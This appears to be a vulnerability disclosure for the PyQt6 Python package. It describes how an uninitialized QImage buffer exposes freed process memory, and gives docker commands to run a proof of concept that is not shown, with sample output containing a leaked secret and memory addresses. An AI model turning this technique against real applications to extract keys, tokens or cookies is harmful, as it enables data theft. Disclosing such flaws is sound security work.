Package manager: pip
Affected modules: PyQt6
Download stats: 1,066,014 montly (pypistats)
Homepage: https://www.riverbankcomputing.com/software/pyqt/
Module description:
PyQt6 is a comprehensive set of Python bindings for Qt v6. It is implemented as more than 35 extension modules and enables Python to be used as an alternative application development language to C++ on all supported platforms including iOS and Android.
PyQt6 may also be embedded in C++ based applications to allow users of those applications to configure or enhance the functionality of those applications.
Read of the uninitialized memory. Possible risk: leak of sensitive data.
The raw process memory is exposed through a QImage instance.
The object's allocated memory is not zeroed, therefore the created image contains the raw bytes from the already freed memory. It could be used to steal highly sensitive data, such as private keys, auth tokens, session cookies or any other memory artifacts.
Note that other image types (QBitmap, QPixmap, etc) are also affected. The vulnerability remains in older versions of PyQt (PyQt4, PyQt5).
I've tested it on Ubuntu 24.04 LTS, Debian 12.
There is a simple PoC in file PoC.py. The PoC shows the two cases:
- leak the content of the deleted variable
- leak the arbitrary part of the memory
You could use the provided Dockerfile in order to preserve the environment.
- Build the image
docker build --tag pyqt6-poc .- Run the image
docker run --rm pyqt6-poc- Expected behaviour
> docker run --rm pyqt6-poc
PyQt6 image content 1: b'{"secret": "leaked!!!!"}{"secret": "leaked!!!!"}{"secret": "leak'
PyQt6 image content 2: b'TB\xe0\x97\x00\x7f;\x00TB\xe0\x97\x00\x7f;\x00"\xfc\x10\xa4\x00UW\x00"\xfc\x10\xa4\x00UW\x00ni\nfc_ohknur\x00\x00f\x00\x00\xb5r\x00\x13\xda\x00pelat_etb'Please note that the first image contains the value of the secret variable. The second image contains some memory addresses.